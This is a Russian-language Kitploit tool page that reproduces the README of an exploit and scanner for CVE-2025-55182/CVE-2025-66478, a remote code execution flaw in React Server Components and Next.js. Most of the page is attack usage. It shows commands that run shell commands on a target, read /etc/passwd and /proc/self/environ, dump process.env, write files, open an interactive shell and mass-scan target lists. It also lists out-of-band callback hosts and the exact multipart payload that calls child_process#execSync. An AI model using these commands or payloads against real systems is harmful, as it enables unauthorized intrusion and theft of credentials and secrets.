Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner | Kitploit
Инструменты/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Сканеры уязвимостейДинамический анализ (песочница)ЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Репозиторий
218 месяцев назадЕщё не проверено

CVE-2025-55182 - Эксплойт RCE для React Server Components v2.0

Комплексный инструмент для исследований в области безопасности, предназначенный для тестирования уязвимостей CVE-2025-55182 и CVE-2025-66478 в React Server Components (RSC) и Server Actions в Next.js.

Обзор уязвимости

СвойствоЗначение
Идентификаторы CVECVE-2025-55182, CVE-2025-66478
Оценка CVSS10.0 (КРИТИЧЕСКАЯ)
Затронутые версииReact < 19.2.0, Next.js < 15.0.5
Тип уязвимостиУдаленное выполнение кода (RCE)
Вектор атакиСеть

Возможности

  • Сканирование уязвимостей в стиле PortSwigger с несколькими пейлоадами обнаружения
  • Несколько RCE-гаджетов (execSync, spawnSync, vm.runInThisContext и др.)
  • Тестирование внеполосных (OOB) callback-вызовов для проверки слепого RCE
  • Возможности чтения/записи файлов
  • Выполнение JavaScript-кода
  • Режим интерактивной оболочки
  • Массовое сканирование с многопоточностью
  • Поддержка прокси (совместимо с Burp Suite)
  • Форматы вывода JSON/Text

Установка

Требования

root@kitploit:~
pip install requests

Версия Python

  • Python 3.7 или выше

Быстрый старт

root@kitploit:~
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan

# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Interactive shell
python3 exploit-custom.py -u https://target.com --shell

Использование

Аргументы командной строки

root@kitploit:~
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Выбор цели

АргументОписаниеПример
-u, --urlURL одной цели-u https://target.com
-l, --listФайл, содержащий URL-l targets.txt

Режимы сканирования

АргументОписание
--detectОпределить использование Next.js/RSC
--check

Эксплуатация

Параметры подключения

Параметры вывода

АргументОписание
-o, --outputСохранить результаты в файл (.json или .txt)
-q, --quietПодавить баннер

Примеры сканирования

Одиночная цель

root@kitploit:~
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect

# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan

# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Массовое сканирование

root@kitploit:~
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json

# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Примеры эксплуатации

Выполнение команд

root@kitploit:~
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

Операции с файлами

root@kitploit:~
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

Выполнение JavaScript

root@kitploit:~
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Интерактивная оболочка

root@kitploit:~
python3 exploit-custom.py -u https://target.com --shell

Команды оболочки:

Доступные гаджеты

RCE-гаджеты

Файловые гаджеты

ИмяИдентификатор модуляОписание
fs_readFileSyncfs#readFileSyncЧтение произвольных файлов
fs_writeFileSyncfs#writeFileSyncЗапись произвольных файлов

OOB-гаджеты

ИмяОписание
vm_fetchHTTP-запрос через fetch API (Node 18+)
vm_httpHTTP-запрос через модуль http

Пейлоады обнаружения (CVE-2025-66478)

Режим --scan использует следующие пейлоады обнаружения в стиле PortSwigger:

Методы OOB-вызовов

Инструмент поддерживает несколько методов OOB-вызовов:

Интерпретация вывода

Цвета терминала

Результаты сканирования

root@kitploit:~
[VULN] property_reference          Vulnerable pattern detected!
        -> Error digest pattern: E{"digest"... (needs OOB verification)
[SAFE] property_reference_v2       HTTP 200
[500]  action_ref_vm               digest:12345

Технические детали

Формат RSC Flight

Инструмент анализирует ответы React Server Components в «flight-формате»:

root@kitploit:~
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}

Структура multipart-пейлоада

root@kitploit:~
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--

Требуемые HTTP-заголовки

root@kitploit:~
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]

Запатченные версии

React

  • 19.0.1, 19.1.2, 19.2.1

Next.js

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Варианты использования

Баг-баунти

root@kitploit:~
# 1. Prepare target list
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt

# 2. Bulk scan
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 3. Verify with OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com

Тестирование на проникновение

root@kitploit:~
# 1. Detect technology
python3 exploit-custom.py -u https://target.com --detect

# 2. Analyze with Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# 3. Exploit
python3 exploit-custom.py -u https://target.com --shell

Ссылки

  • Бюллетень безопасности Next.js — CVE-2025-66478
  • Исследование Wiz — CVE-2025-55182
  • Исследования PortSwigger

Правовое предупреждение

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.

ПРЕДУПРЕЖДЕНИЕ: Несанкционированный доступ к компьютерным системам противозаконен. Используйте этот инструмент только на системах, которыми вы владеете, или на тестирование которых у вас есть явное письменное разрешение.

Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Лицензия

Этот инструмент выпущен для целей исследования безопасности и авторизованного тестирования на проникновение.


Автор: Ünsal Furkan Harani Версия: 2.0

Скачать инструмент
Быстрая проверка уязвимости (математический тест)
--scanПолное сканирование уязвимостей (в стиле PortSwigger)
--test-allПротестировать все гаджеты и пейлоады обнаружения
АргументОписаниеПример
--cmdВыполнить команду оболочки--cmd "id"
--gadgetУказать используемый гаджет--gadget execSync
--readПрочитать файл с целевой системы--read /etc/passwd
--writeЗаписать файл на целевую систему--write /tmp/test.txt "content"
--jsВыполнить JavaScript-код--js "process.env"
--shellЗапустить интерактивную оболочку--shell
--oobХост для OOB-вызовов--oob xyz.oastify.com
АргументОписаниеПример
-p, --proxyHTTP/HTTPS прокси-p http://127.0.0.1:8080
-c, --cookiesСтрока cookie-c "session=abc123"
-H, --headerДополнительный заголовок (можно повторять)-H "X-Custom: value"
-t, --threadsКоличество потоков для массового сканирования-t 20
--timeoutТаймаут запроса в секундах--timeout 60
КомандаОписание
<command>Выполнить команду оболочки
!read <file>Прочитать файл
!write <file> <content>Записать файл
!js <code>Выполнить JavaScript
!gadget <name>Переключить гаджет
exitВыйти из оболочки
ИмяИдентификатор модуляОписание
execSyncchild_process#execSyncПрямое выполнение команд оболочки
execFileSyncchild_process#execFileSyncВыполнение бинарного файла
spawnSyncchild_process#spawnSyncЗапуск процесса с аргументами
vm_runInThisContextvm#runInThisContextВыполнение JS в текущем контексте
vm_runInNewContextvm#runInNewContextВыполнение JS с выходом из песочницы
vm_runInThisContext_globalvm#runInThisContextВыполнение через global.process
ПейлоадОписание
property_referenceСсылка на свойство, разделённая двоеточиями ["$1:a:a"]
property_reference_v2Альтернативная ссылка ["$1:b:b"]
property_reference_constructorДоступ к конструктору через ссылку на свойство
property_reference_protoДоступ к цепочке прототипов через ссылку на свойство
action_ref_vmACTION_REF с vm#runInThisContext
action_ref_execSyncACTION_REF с child_process#execSync
МетодОписание
curlHTTP-запрос через команду curl
wgetHTTP-запрос через команду wget
nslookupDNS-запрос
pingICMP-пинг
fetchAPI fetch в Node.js
httpМодуль http в Node.js
ЦветСтатусЗначение
Зелёный[VULN]Уязвим — RCE подтверждён
Жёлтый[PATCH]Запатчен — Server Actions активны, но защищены
Синий[RSC]Обнаружены Server Actions
Голубой[NEXT]Обнаружен Next.js
Красный[ERR]Ошибка соединения